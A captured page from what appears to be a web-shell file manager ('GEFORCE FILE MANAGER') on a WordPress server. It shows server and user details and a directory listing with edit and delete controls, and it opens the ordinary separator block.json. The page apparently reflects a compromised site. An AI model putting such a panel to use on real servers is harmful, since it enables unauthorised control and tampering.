[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-includes
/
blocks
/
separator
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 block.json
1,146 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor-rtl.css
105 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor-rtl.min.css
97 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor.css
105 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor.min.css
97 B
SET
[ EDIT ]
|
[ DEL ]
📄 style-rtl.css
461 B
SET
[ EDIT ]
|
[ DEL ]
📄 style-rtl.min.css
405 B
SET
[ EDIT ]
|
[ DEL ]
📄 style.css
461 B
SET
[ EDIT ]
|
[ DEL ]
📄 style.min.css
405 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme-rtl.css
485 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme-rtl.min.css
437 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme.css
485 B
SET
[ EDIT ]
|
[ DEL ]
📄 theme.min.css
437 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: block.json
{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "core/separator", "title": "Separator", "category": "design", "description": "Create a break between ideas or sections with a horizontal separator.", "keywords": [ "horizontal-line", "hr", "divider" ], "textdomain": "default", "attributes": { "opacity": { "type": "string", "default": "alpha-channel" }, "tagName": { "type": "string", "enum": [ "hr", "div" ], "default": "hr" } }, "supports": { "anchor": true, "align": [ "center", "wide", "full" ], "color": { "enableContrastChecker": false, "__experimentalSkipSerialization": true, "gradients": true, "background": true, "text": false, "__experimentalDefaultControls": { "background": true } }, "spacing": { "margin": [ "top", "bottom" ] }, "interactivity": { "clientNavigation": true } }, "styles": [ { "name": "default", "label": "Default", "isDefault": true }, { "name": "wide", "label": "Wide Line" }, { "name": "dots", "label": "Dots" } ], "editorStyle": "wp-block-separator-editor", "style": "wp-block-separator" }